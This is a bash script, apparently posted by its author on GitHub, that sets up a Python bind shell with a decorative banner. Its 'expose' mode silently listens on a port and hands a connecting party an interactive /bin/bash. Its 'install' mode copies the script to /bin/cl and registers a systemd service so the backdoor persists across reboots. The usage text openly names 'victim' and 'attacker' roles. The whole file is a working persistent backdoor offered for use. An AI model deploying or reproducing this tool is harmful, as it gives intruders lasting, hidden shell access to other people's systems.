#!/bin/bash
# Created by @rvcgeeks____ <github.com/rvcgeeks> @Pune, India @12/12/2019, 1:15 am
# Bind shell script in python

  case $1 in


  expose)
    while [ 1 ] ; do
      python -c "import socket, pty, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((socket.gethostbyname('$2'), $3))
s.listen(128)
c, a = s.accept()
os.dup2(c.fileno(), 0)
os.dup2(c.fileno(), 1)
os.dup2(c.fileno(), 2)
pty.spawn('/bin/bash')" >> /dev/null 2>&1 
    done
    ;;


  open)
    echo '[38;2;255;0;0m ▏▎▍▌▋▉█▇▆▅▄▃▂▁ ▁▂▃▄▅▆▇█▉▊▊▋▌▍▎▏▏▎▍▌▋▉█▇▆▅▄▃▂▁ ▁▂▃▄▅▆▇█▉▊▊▋▌▍[0m
[48;2;255;0;0m[1;94m[38;2;255;255;255m                 🤖🐉💻 RVC BIND SHELL 💻🐉🤖                [0m'
    sizes=$(stty size)
    rows=$(echo $sizes | awk '{print $1}')
    columns=$(echo $sizes | awk '{print $2}')
    python -c "import socket, os, tty, termios, thread
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((socket.gethostbyname('$2'), $3))
s.send('stty rows $rows columns $columns\n')
def hear():
    while True:
        os.write(1, s.recv(1))
thread.start_new_thread(hear, tuple())
old_sett = termios.tcgetattr(0)
tty.setraw(0)
while True:
  try:
    s.send(os.read(0, 1))
  except:
    break
termios.tcsetattr(0, termios.TCSADRAIN, old_sett)"
    ;;


  install) 
    if [ $EUID -ne 0 ] ; then exit 1 ; fi  
    cp $0 /bin/cl
    echo "Wants = network.target
[Service]
ExecStart=/bin/cl expose $2 $3
[Install]
WantedBy=network-online.target" > /etc/systemd/system/cl.service
    systemctl daemon-reload
    systemctl enable cl
    systemctl start cl
    ;;


  uninstall)
    if [ $EUID -ne 0 ] ; then exit 1 ; fi 
    systemctl stop cl
    systemctl disable cl
    systemctl daemon-reload
    rm /etc/systemd/system/cl.service
    rm /bin/cl
    ;;


  *)
    echo "usage >>
  (victim)  $ $0 [expose | install] (hacker hostname) (port no)
  (attacker)$ $0 open (hacker hostname) (port no)
  (victim)  $ $0 uninstall\n"
    ;;


  esac
